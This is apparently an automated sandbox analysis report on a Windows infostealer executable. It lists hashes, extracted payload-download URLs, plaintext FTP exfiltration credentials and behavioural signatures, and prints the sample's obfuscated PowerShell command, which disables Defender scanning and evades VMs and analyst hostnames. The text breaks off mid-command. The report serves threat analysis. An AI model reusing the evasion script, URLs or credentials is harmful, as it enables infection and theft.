Analysis
-
max time kernel
142s -
max time network
111s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
24-04-2023 17:19
Behavioral task
behavioral1
Sample
023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
Resource
win10v2004-20230220-en
General
-
Target
023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe
-
Size
30.7MB
-
MD5
9650ac3a9de8d51fddab092c7956bdae
-
SHA1
f52b9ec5b9629a746c679394953dc56407b8a419
-
SHA256
023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e
-
SHA512
82cd32a8b5b84c067a7a7989831041b4453f7ed7cc5ee4308e7dc5e495410267e03b6ea9ad3441adfa5e0313e274b2f43976121959d2c72b80d00719bb91d14e
-
SSDEEP
196608:TQ6kL2Vmd6+DXLZy7YM30Lzajzpj4sd5bL:vkL2Vmd6m70Gzajz9Pd5n
Malware Config
Extracted
http://193.42.33.232/meokl/KK2023.zip
http://193.42.33.232/alheim/Confirm.zip
http://193.42.33.232/mrytr/MnMs.zip
Extracted
Protocol: ftp- Host:
89.116.53.55 - Port:
21 - Username:
u999382941 - Password:
Test1234
Signatures
-
Blocklisted process makes network request 19 IoCs
Processes:
powershell.exeflow pid process 33 3260 powershell.exe 41 3260 powershell.exe 57 3260 powershell.exe 58 3260 powershell.exe 59 3260 powershell.exe 61 3260 powershell.exe 62 3260 powershell.exe 63 3260 powershell.exe 64 3260 powershell.exe 65 3260 powershell.exe 67 3260 powershell.exe 68 3260 powershell.exe 69 3260 powershell.exe 70 3260 powershell.exe 71 3260 powershell.exe 72 3260 powershell.exe 73 3260 powershell.exe 74 3260 powershell.exe 75 3260 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 4 IoCs
Processes:
Lst.exeLst.exeConfirm.exeConfirm.exepid process 1480 Lst.exe 2756 Lst.exe 1692 Confirm.exe 2508 Confirm.exe -
Loads dropped DLL 49 IoCs
Processes:
023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exeLst.exeConfirm.exepid process 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2756 Lst.exe 2508 Confirm.exe 2508 Confirm.exe 2508 Confirm.exe 2508 Confirm.exe 2508 Confirm.exe 2508 Confirm.exe 2508 Confirm.exe 2508 Confirm.exe 2508 Confirm.exe 2508 Confirm.exe 2508 Confirm.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 32 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exeLst.exeConfirm.exepid process 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe 2756 Lst.exe 2508 Confirm.exe -
Detects Pyinstaller 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\NewStream\Lst.exe pyinstaller C:\Users\Admin\AppData\Local\NewStream\Lst.exe pyinstaller C:\Users\Admin\AppData\Local\NewStream\Lst.exe pyinstaller C:\Users\Admin\AppData\Local\NewStream\Lst.exe pyinstaller C:\Users\Admin\AppData\Roaming\Google-Update\Confirm.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings cmd.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 628 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3224 powershell.exe 3224 powershell.exe 3260 powershell.exe 3260 powershell.exe 3864 powershell.exe 3864 powershell.exe 3864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3224 powershell.exe Token: SeIncreaseQuotaPrivilege 3224 powershell.exe Token: SeSecurityPrivilege 3224 powershell.exe Token: SeTakeOwnershipPrivilege 3224 powershell.exe Token: SeLoadDriverPrivilege 3224 powershell.exe Token: SeSystemProfilePrivilege 3224 powershell.exe Token: SeSystemtimePrivilege 3224 powershell.exe Token: SeProfSingleProcessPrivilege 3224 powershell.exe Token: SeIncBasePriorityPrivilege 3224 powershell.exe Token: SeCreatePagefilePrivilege 3224 powershell.exe Token: SeBackupPrivilege 3224 powershell.exe Token: SeRestorePrivilege 3224 powershell.exe Token: SeShutdownPrivilege 3224 powershell.exe Token: SeDebugPrivilege 3224 powershell.exe Token: SeSystemEnvironmentPrivilege 3224 powershell.exe Token: SeRemoteShutdownPrivilege 3224 powershell.exe Token: SeUndockPrivilege 3224 powershell.exe Token: SeManageVolumePrivilege 3224 powershell.exe Token: 33 3224 powershell.exe Token: 34 3224 powershell.exe Token: 35 3224 powershell.exe Token: 36 3224 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeIncreaseQuotaPrivilege 3260 powershell.exe Token: SeSecurityPrivilege 3260 powershell.exe Token: SeTakeOwnershipPrivilege 3260 powershell.exe Token: SeLoadDriverPrivilege 3260 powershell.exe Token: SeSystemProfilePrivilege 3260 powershell.exe Token: SeSystemtimePrivilege 3260 powershell.exe Token: SeProfSingleProcessPrivilege 3260 powershell.exe Token: SeIncBasePriorityPrivilege 3260 powershell.exe Token: SeCreatePagefilePrivilege 3260 powershell.exe Token: SeBackupPrivilege 3260 powershell.exe Token: SeRestorePrivilege 3260 powershell.exe Token: SeShutdownPrivilege 3260 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeSystemEnvironmentPrivilege 3260 powershell.exe Token: SeRemoteShutdownPrivilege 3260 powershell.exe Token: SeUndockPrivilege 3260 powershell.exe Token: SeManageVolumePrivilege 3260 powershell.exe Token: 33 3260 powershell.exe Token: 34 3260 powershell.exe Token: 35 3260 powershell.exe Token: 36 3260 powershell.exe Token: SeIncreaseQuotaPrivilege 3260 powershell.exe Token: SeSecurityPrivilege 3260 powershell.exe Token: SeTakeOwnershipPrivilege 3260 powershell.exe Token: SeLoadDriverPrivilege 3260 powershell.exe Token: SeSystemProfilePrivilege 3260 powershell.exe Token: SeSystemtimePrivilege 3260 powershell.exe Token: SeProfSingleProcessPrivilege 3260 powershell.exe Token: SeIncBasePriorityPrivilege 3260 powershell.exe Token: SeCreatePagefilePrivilege 3260 powershell.exe Token: SeBackupPrivilege 3260 powershell.exe Token: SeRestorePrivilege 3260 powershell.exe Token: SeShutdownPrivilege 3260 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeSystemEnvironmentPrivilege 3260 powershell.exe Token: SeRemoteShutdownPrivilege 3260 powershell.exe Token: SeUndockPrivilege 3260 powershell.exe Token: SeManageVolumePrivilege 3260 powershell.exe Token: 33 3260 powershell.exe Token: 34 3260 powershell.exe Token: 35 3260 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Confirm.exepid process 2508 Confirm.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.execmd.exepowershell.exeLst.exeLst.exeConfirm.exeConfirm.exepowershell.exedescription pid process target process PID 4084 wrote to memory of 1064 4084 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe PID 4084 wrote to memory of 1064 4084 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe PID 1064 wrote to memory of 3992 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe cmd.exe PID 1064 wrote to memory of 3992 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe cmd.exe PID 1064 wrote to memory of 3224 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe powershell.exe PID 1064 wrote to memory of 3224 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe powershell.exe PID 1064 wrote to memory of 3824 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe cmd.exe PID 1064 wrote to memory of 3824 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe cmd.exe PID 1064 wrote to memory of 3260 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe powershell.exe PID 1064 wrote to memory of 3260 1064 023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe powershell.exe PID 3824 wrote to memory of 628 3824 cmd.exe NOTEPAD.EXE PID 3824 wrote to memory of 628 3824 cmd.exe NOTEPAD.EXE PID 3260 wrote to memory of 1316 3260 powershell.exe HOSTNAME.EXE PID 3260 wrote to memory of 1316 3260 powershell.exe HOSTNAME.EXE PID 3260 wrote to memory of 672 3260 powershell.exe HOSTNAME.EXE PID 3260 wrote to memory of 672 3260 powershell.exe HOSTNAME.EXE PID 3260 wrote to memory of 3988 3260 powershell.exe netsh.exe PID 3260 wrote to memory of 3988 3260 powershell.exe netsh.exe PID 3260 wrote to memory of 1480 3260 powershell.exe Lst.exe PID 3260 wrote to memory of 1480 3260 powershell.exe Lst.exe PID 1480 wrote to memory of 2756 1480 Lst.exe Lst.exe PID 1480 wrote to memory of 2756 1480 Lst.exe Lst.exe PID 2756 wrote to memory of 4712 2756 Lst.exe cmd.exe PID 2756 wrote to memory of 4712 2756 Lst.exe cmd.exe PID 3260 wrote to memory of 844 3260 powershell.exe HOSTNAME.EXE PID 3260 wrote to memory of 844 3260 powershell.exe HOSTNAME.EXE PID 3260 wrote to memory of 2640 3260 powershell.exe HOSTNAME.EXE PID 3260 wrote to memory of 2640 3260 powershell.exe HOSTNAME.EXE PID 3260 wrote to memory of 1692 3260 powershell.exe Confirm.exe PID 3260 wrote to memory of 1692 3260 powershell.exe Confirm.exe PID 1692 wrote to memory of 2508 1692 Confirm.exe Confirm.exe PID 1692 wrote to memory of 2508 1692 Confirm.exe Confirm.exe PID 2508 wrote to memory of 1552 2508 Confirm.exe cmd.exe PID 2508 wrote to memory of 1552 2508 Confirm.exe cmd.exe PID 2508 wrote to memory of 3864 2508 Confirm.exe powershell.exe PID 2508 wrote to memory of 3864 2508 Confirm.exe powershell.exe PID 3864 wrote to memory of 1412 3864 powershell.exe HOSTNAME.EXE PID 3864 wrote to memory of 1412 3864 powershell.exe HOSTNAME.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe"C:\Users\Admin\AppData\Local\Temp\023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Users\Admin\AppData\Local\Temp\023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe"C:\Users\Admin\AppData\Local\Temp\023548a5ce0de9f8b748a2fd8c4d1ae6c924c40acbde32e9599c868115d11f4e.exe"2⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵PID:3992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model;$IsVirtual"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3224 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40842\1.txt"3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\_MEI40842\1.txt4⤵
- Opens file in notepad (likely ransom note)
PID:628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass "$startdate=(Get-Date 2022-11-09).toString(\"yyyy-MM-dd\") $enddate=(Get-Date 2024-03-04).toString(\"yyyy-MM-dd\") $today=Get-Date -format yyyy-MM-dd function IsInWindowsSandbox { $inSandbox = $false $env:SandboxProfilePath = $null $env:SandboxUid = $null if ($env:WSB_IsHostEnvironment -eq \"1\" -and $env:WSB_Sandboxed -eq \"1\") { $inSandbox = $true $env:SandboxProfilePath = $env:WSB_ProfilePath $env:SandboxUid = $env:WSB_Uid } return $inSandbox } if (IsInWindowsSandbox) { exit } else { if($today -ge $startdate -and $today -le $enddate){ $ProgressPreference = \"S\"+\"i\"+\"l\"+\"e\"+\"n\"+\"t\"+\"l\"+\"y\"+\"C\"+\"o\"+\"n\"+\"t\"+\"i\"+\"n\"+\"u\"+\"e\" $ErrorActionPreference = \"S\"+\"i\"+\"l\"+\"e\"+\"n\"+\"t\"+\"l\"+\"y\"+\"C\"+\"o\"+\"n\"+\"t\"+\"i\"+\"n\"+\"u\"+\"e\" $new_line= \"A\"+\"d\"+\"d\"+\"-\"+\"M\"+\"p\"+\"P\"+\"r\"+\"e\"+\"f\"+\"e\"+\"r\"+\"e\"+\"n\"+\"c\"+\"e\"+\" -E\"+\"x\"+\"c\"+\"l\"+\"u\"+\"s\"+\"i\"+\"o\"+\"n\"+\"P\"+\"a\"+\"t\"+\"h\";$last_line=\"$pwd\".SubString(0,3);Invoke-Expression \"$new_line $last_line -Force\" $IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model if ($IsVirtual -eq 'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x'){ exit }elseif($IsVirtual -eq 'V'+'M'+'W'+'a'+'r'+'e') { exit }elseif($IsVirtual -eq 'H'+'y'+'p'+'e'+'r'+'-'+'V') { exit }elseif($IsVirtual -eq 'P'+'a'+'r'+'a'+'l'+'l'+'e'+'l'+'s') { exit }elseif($IsVirtual -eq 'O'+'r'+'a'+'c'+'l'+'e'+' '+'V'+'M'+' '+'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x') { exit }elseif($IsVirtual -eq 'C'+'i'+'t'+'r'+'i'+'x'+' '+'H'+'y'+'p'+'e'+'r'+'v'+'i'+'s'+'o'+'r') { exit }elseif($IsVirtual -eq 'Q'+'E'+'M'+'U') { exit }elseif($IsVirtual -eq 'K'+'V'+'M') { exit }elseif($IsVirtual -eq 'P'+'r'+'o'+'x'+'m'+'o'+'x'+' '+'V'+'E') { exit }elseif($IsVirtual -eq 'D'+'o'+'c'+'k'+'e'+'r') { exit }else { $HNAME2023=hostname if ($HNAME2023 -eq '0'+'0'+'9'+'0'+'0'+'B'+'C'+'8'+'3'+'8'+'0'+'3') { exit } if ($HNAME2023 -eq '0'+'C'+'C'+'4'+'7'+'A'+'C'+'8'+'3'+'8'+'0'+'3') { exit } if ($HNAME2023 -eq '6'+'C'+'4'+'E'+'7'+'3'+'3'+'F'+'-'+'C'+'2'+'D'+'9'+'-'+'4') { exit } if ($HNAME2023 -eq 'A'+'C'+'E'+'P'+'C') { exit } if ($HNAME2023 -eq 'A'+'I'+'D'+'A'+'N'+'P'+'C') { exit } if ($HNAME2023 -eq 'A'+'L'+'E'+'N'+'M'+'O'+'O'+'S'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'A'+'L'+'I'+'O'+'N'+'E') { exit } if ($HNAME2023 -eq 'A'+'P'+'P'+'O'+'N'+'F'+'L'+'Y'+'-'+'V'+'P'+'S') { exit } if ($HNAME2023 -eq 'A'+'R'+'C'+'H'+'I'+'B'+'A'+'L'+'D'+'P'+'C') { exit } if ($HNAME2023 -eq 'a'+'z'+'u'+'r'+'e') { exit } if ($HNAME2023 -eq 'B'+'3'+'0'+'F'+'0'+'2'+'4'+'2'+'-'+'1'+'C'+'6'+'A'+'-'+'4') { exit } if ($HNAME2023 -eq 'B'+'A'+'R'+'O'+'S'+'I'+'N'+'O'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'B'+'E'+'C'+'K'+'E'+'R'+'-'+'P'+'C') { exit } if ($HNAME2023 -eq 'B'+'E'+'E'+'7'+'3'+'7'+'0'+'C'+'-'+'8'+'C'+'0'+'C'+'-'+'4') { exit } if ($HNAME2023 -eq 'C'+'O'+'F'+'F'+'E'+'E'+'-'+'S'+'H'+'O'+'P') { exit } if ($HNAME2023 -eq 'C'+'O'+'M'+'P'+'N'+'A'+'M'+'E'+'_'+'4'+'0'+'4'+'7') { exit } if ($HNAME2023 -eq 'd'+'1'+'b'+'n'+'J'+'k'+'f'+'V'+'l'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'1'+'9'+'O'+'L'+'L'+'T'+'D') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'1'+'P'+'Y'+'K'+'P'+'2'+'9') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'1'+'Y'+'2'+'4'+'3'+'3'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'4'+'U'+'8'+'D'+'T'+'F'+'8') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'5'+'4'+'X'+'G'+'X'+'6'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'5'+'O'+'V'+'9'+'S'+'0'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'A'+'K'+'Q'+'Q'+'A'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'6'+'B'+'M'+'F'+'T'+'6'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'7'+'0'+'T'+'5'+'S'+'D'+'X') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'7'+'A'+'F'+'S'+'T'+'D'+'P') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'7'+'X'+'C'+'6'+'G'+'E'+'Z') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'8'+'K'+'9'+'D'+'9'+'3'+'B') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'A'+'H'+'G'+'X'+'K'+'T'+'V') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'A'+'L'+'B'+'E'+'R'+'T'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'0'+'T'+'9'+'3'+'D'+'6') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'G'+'N'+'5'+'L'+'8'+'Y') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'U'+'G'+'I'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'B'+'X'+'J'+'Y'+'A'+'E'+'C') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'B'+'G'+'P'+'F'+'E'+'E') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'D'+'Q'+'E'+'7'+'V'+'N') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'H'+'A'+'Y'+'A'+'N'+'N') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'M'+'0'+'D'+'A'+'W'+'8') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'N'+'F'+'V'+'L'+'M'+'W') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'C'+'R'+'C'+'C'+'C'+'O'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'0'+'1'+'9'+'G'+'D'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'4'+'F'+'E'+'N'+'3'+'M') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'E'+'3'+'6'+'9'+'S'+'E') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'D'+'I'+'L'+'6'+'I'+'Y'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'E'+'C'+'W'+'Z'+'X'+'Y'+'2') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'7'+'B'+'G'+'E'+'N'+'9') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'F'+'S'+'H'+'H'+'Z'+'L'+'J') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'4'+'C'+'W'+'F'+'L'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'E'+'L'+'A'+'T'+'O'+'R') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'L'+'B'+'A'+'Z'+'X'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'N'+'Q'+'Z'+'M'+'0'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'G'+'P'+'P'+'K'+'5'+'V'+'Q') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'H'+'A'+'S'+'A'+'N'+'L'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'H'+'Q'+'L'+'U'+'W'+'F'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'H'+'S'+'S'+'0'+'D'+'J'+'9') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'I'+'A'+'P'+'K'+'N'+'1'+'P') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'I'+'F'+'C'+'A'+'Q'+'V'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'I'+'O'+'N'+'5'+'Z'+'S'+'B') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'J'+'Q'+'P'+'I'+'F'+'W'+'D') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'K'+'A'+'L'+'V'+'I'+'N'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'K'+'O'+'K'+'O'+'V'+'S'+'K') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'A'+'K'+'F'+'F'+'M'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'K'+'P'+'0'+'I'+'4'+'P') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'M'+'1'+'Z'+'P'+'L'+'G') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'N'+'T'+'U'+'7'+'V'+'U'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Q'+'U'+'A'+'Y'+'8'+'G'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'C'+'A'+'3'+'Q'+'W'+'X') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'R'+'H'+'X'+'D'+'K'+'W'+'W') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'1'+'L'+'F'+'P'+'H'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'S'+'U'+'P'+'E'+'R'+'I'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'1'+'L'+'2'+'6'+'J'+'5') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'I'+'R'+'E'+'N'+'D'+'O') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'K'+'N'+'F'+'F'+'B'+'6') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'R'+'S'+'Q'+'L'+'A'+'G') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'W'+'J'+'U'+'7'+'M'+'F') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'V'+'Z'+'5'+'Z'+'S'+'Y'+'I') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'8'+'J'+'L'+'V'+'9'+'V') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'G'+'3'+'M'+'Y'+'J'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'W'+'I'+'8'+'C'+'L'+'E'+'T') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'X'+'O'+'Y'+'7'+'M'+'H'+'S') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Y'+'8'+'A'+'S'+'U'+'I'+'L') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Y'+'W'+'9'+'U'+'O'+'1'+'H') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'J'+'F'+'9'+'K'+'A'+'N') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'M'+'Y'+'E'+'H'+'D'+'A') { exit } if ($HNAME2023 -eq 'D'+'E'+'S'+'K'+'T'+'O'+'P'+'-'+'Z'+'N'+'C'+'A'+'E'+'A'+'M') { exit } if 